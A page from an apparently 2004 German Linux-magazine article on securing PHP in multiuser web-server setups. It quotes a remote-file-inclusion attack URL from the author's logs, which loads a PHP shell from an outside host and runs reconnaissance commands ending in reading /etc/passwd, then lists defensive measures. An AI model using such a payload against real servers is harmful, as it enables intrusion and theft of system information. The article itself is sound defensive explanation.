PHP in Multiuser-Umgebungen sicher betreiben « 10 « 2004 « Ausgaben « Heft & Abo

Open Source im professionellen Einsatz	Newsletter abonnieren Seite durchsuchen
HEFTARCHIV \| NEWS \| E-BIBLIOTHEK \| VIDEO \| BLOGS \| WHITEPAPER \| EVENTS \| ACADEMY \| ABO \| SHOP

Heftarchiv

Live-Streaming

IT-Profimarkt

Stellenangebote

Seminarsuche

Home » Heft & Abo » Heftarchiv » 2004 » 10 » Airbag für den Webserver

Unix-Kommandos bequem per PHP-Shell

Der folgende Fund in den Logfiles des Autors zeigt, was sich alles anrichten lässt, wenn es keine ausreichende Absicherung gibt. Die Zeichenfolge »%20« ist ein URL-kodiertes Leerzeichen.

http://www.heinlein-support.de/index.php?id=http://farpador.ubbi.com.br/cmd.txt?&cmd=uname%20-a;cat%20/proc/version;uptime;id;pwd;/sbin/ifconfig|grep%20inet;cat%20/etc/passwd

Diese URL versucht von der Webseite »http://farpador.ubbi.com.br« die PHP-Shell »cmd.txt« nachzuladen. Dieser Shell übergibt der Aufruf gleich das gewünschte Unix-Shell-Kommando, es ermittelt das Betriebssystem, die Uptime, die Benutzerkennung und das Arbeitsverzeichnis sowie die IP-Adressen und hängt am Ende noch den Inhalt von »/etc/ passwd« an.

Stichprobenhaft sollte der Admin diese verdächtigen URLs in seinen Browser kopieren und prüfen, wie die angegriffene Webseite auf den Manipulationsversuch reagiert. Zeigt sie auch nur ansatzweise die gesuchten Systeminformationen, sind Überstunden angesagt.

Verdächtige URLs prüfen

Das Auftauchen solcher URLs an sich heißt aber nicht, dass der Angreifer Erfolg hatte. Hier ist nur der Versuch zu sehen, Systemkommandos auszuführen. Dagegen sollte der Administrator Folgendes unternehmen:

In der Firewall verhindern, dass der Webserver externe FTP- oder HTTP-Quellen abfragt. Dazu ausgehende TCP-Verbindungen blocken oder mindestens Daten an Zielport 80 filtern.
Falls HTTP-Verbindungen zum Beispiel für Linux- oder Antiviren-Updates notwendig sind, sollten diese nur an die Webserver der jeweiligen Hersteller erlaubt sein.
Seine Nutzer über sorgsame PHP-Programmierung aufklären.
Das Ausführen von Systemkommandos in PHP deaktivieren, sofern dies möglich ist.

PHP bietet die sehr sinnvolle Möglichkeit, gefährliche Kommandos für den PHP-Interpreter zu sperren.

« vorige Seite nächste Seite » 1 2 3 4 5 6 7 8 9

Ähnliche Artikel
Schnurlos schnurren	No Cat Auth authentifiziert WLAN-Benutzer am NAT-Router
Tolle Rolle	Video-Streaming mit Lighttpd und Apache
Obst-Diät	Schlanke Webanwendungen mit Cherrypy
Airbag für den Webserver	PHP in Multiuser-Umgebungen sicher betreiben
Brave GNU World	Die monatliche GNU-Kolumne
Erweiterte Gesprächskultur	Workshop: Die eigene Asterisk-Anlage - Teil 2

Whitepaper

The Role of Open Source in Data Integration

Obwohl in den letzten Jahren viele technische Fortschritte erzielt werden konnten, verfügen die meisten Datenintegrationsprozesse nach wie vor nur über eine sehr begrenzte Automatisierung. Das vorliegende White Paper von dem Industry Analyst Mark Madson wird zunächst ein grundlegendes Verständnis von Daten Integration vermitteln, die Vorzüge von Open Source Lösungen für Daten Integration erläutern und Ihnen professionelle Empfehlungen geben, damit Sie Ihre Integrationsjobs noch einfacher und produktiver gestalten können.

Download PDF (Registrierung erforderlich)

Open Source Datenintegration in der Praxis: Fallstudien und Anwendungsbeispiele (Folge 2)

Der zweite Teil des Open Source Datenintegration in der Praxis: Fallstudien und Anwendungsbeispiele White Papers beleuchtet anhand weiterer ausgewählter Case Studies die Implementierung von Open Source Datenintegration in der Praxis und benennt die daraus resultierenden Vorteile.

Download PDF (Registrierung erforderlich)

Kommentare (0)

Dieser Online-Artikel kann Links enthalten, die auf nicht mehr vorhandene Seiten verweisen. Wir ändern solche "broken links" nur in wenigen Ausnahmefällen. Der Online-Artikel soll möglichst unverändert der gedrucken Fassung entsprechen.